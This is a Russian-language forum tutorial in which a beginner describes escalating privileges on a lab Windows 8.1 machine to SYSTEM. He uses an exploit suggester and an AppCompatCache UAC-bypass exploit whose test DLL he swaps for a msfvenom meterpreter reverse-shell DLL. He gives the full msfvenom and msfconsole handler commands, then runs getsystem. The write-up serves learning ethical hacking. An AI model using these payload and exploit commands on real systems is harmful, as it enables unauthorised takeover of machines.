• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Статья Повышаем Windows 8.1 до SYSTEM весёлым способом

Всем тевирп, я новичок, я решил для себя написать статью в которой покажу как я повысил права до system, может это извращённый метод, но просто читайте её :)

Я смотрел один урок по повышению привилегий на системе Windows и решил поиграть с этим, и увлёкся. Пишу потому что думаю, что я так лучше запомню инфу

Попытка быстро получить SYSTEM

Собственно забрался я в систему под Windows 8.1, момент как я это сделал, я пропущу потому, что я сейчас изучаю повышение привилегий, а не как скрытно хакнуть, поэтому я просто залил чистый shell, с помощью msfvenom

Когда я получил сессию моей целью было повысить привилегии до SYSTEM!
Я тыркался в этих быстрых командах с надеждой на быстрый ХАК, но нифига

1673018812934.png

И тут я пошёл в shell, что бы посмотреть там интересное

Этап 1: Поиск вкусного

1673019339838.png

systeminfo - отображает подробную информацию о конфигурации компьютера и его операционной системы, включая конфигурацию операционной системы, информацию о безопасности, идентификатор продукта и свойства оборудования (например, ОЗУ, место на диске и сетевые карты).
Systeminfo перенаправил в текстовик, после этого я загрузил на Kali этот файл, и сейчас будем смотреть в него

Но перед этим нужно скачать exploit_suggester, например такой: GitHub - AonCyberLabs/Windows-Exploit-Suggester: This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.

Ищем уязвимости:
./windows-exploit-suggester.py --update что бы использовать и обновить новую, чистую БД
ключ -d передать файл, содержащий бюллетень безопасности Microsoft база данных
ключик -i означает передать входной файл, содержащий 'systeminfo'

1673019903660.png



Много всего давайте фильтровать, фильтровал я глазом и увидел это!
1673020101834.png

Я выбрал что сегодня будет эта уязвимость и пошёл :)

Этап 2: Изучение этого эксплоита

1673020274295.png


Сначала я испугался потому что не увидел кода, а plain text. Но мой примитивный анализ и чтения этого plain текста, дало мне связь в мозг что код находится на 2 строке, и я скачал его и загрузил на Windows
1673020397886.png

1) Поместите AppCompatCache.exe и Testdll.dll на диск
2) Убедитесь, что UAC включен, текущий пользователь является администратором с разделенным токеном, а параметр UAC установлен по умолчанию (нет запроса для определенных исполняемых файлов).
3) Запустите AppCompatCache из командной строки с помощью командной строки «AppCompatCache.exe c:\windows\system32\ComputerDefaults.exe testdll.dll».
4) В случае успеха калькулятор должен работать от имени администратора. Если это не сработает в первый раз (и вы получите программу ComputerDefaults), повторно запустите эксплойт из 3, иногда при первом запуске возникает проблема с кэшированием/временем.

После выполнения команды "AppCompatCache.exe c:\windows\system32\ComputerDefaults.exe testdll.dll" я немного не понял... Какой калькулятор? мне надо права повысить
1673020651001.png


Я понял что всё дело в testdll.dll и работать надо с ним, но я новичок и я снова испугался, но не обосрался. И пошёл гуглить как сделать вредоносный dll, и в первой ссылке msfvenom мне помог!
Но и тут потом встал вопрос, я же получу reverse shell, а мне нужен то NT\SYSTEM.

Этап 3: Хакаем!
Генерируем shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.117 LPORT=5556 -f dll > testdll.dll
теперь я заменяю тот dll, который запускал калькулятор, на свой shell


1673021878260.png

Я понимал, что бы это сработало нужна ещё сессия, её мы и создадим

msfconsole -q
-q означает запускать без баннера
set payload windows/meterpreter/reverse_tcp set lport 5556 set lhost 192.168.56.117 run

1673022049244.png


Само собой прошло всё радужно!
1673022404765.png

Но мы видим что я не SYSTEM :(
Но это обман!
1673022514434.png

Пишем тот самый getsystem который не сработал в первый раз, и УРА!


Крайние слова

Господа, я рад что могу тут поделиться своим творением, и обучением этичным хакингом, мне нужна мотивация и сегодня она была!
Было интересно, думаю и статья такая же, интересней чем просто взять Ethernualblue, и сразу стать SYSTEM !!!
 
Последнее редактирование модератором:

apache2

Green Team
26.02.2021
33
17
BIT
214
Так как Windows Exploit Suggester отправился в архив гитхаба
1693060984199.png


Используем WES-NG, может кто-то его уже знал, но я не знал, а теперь узнал.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!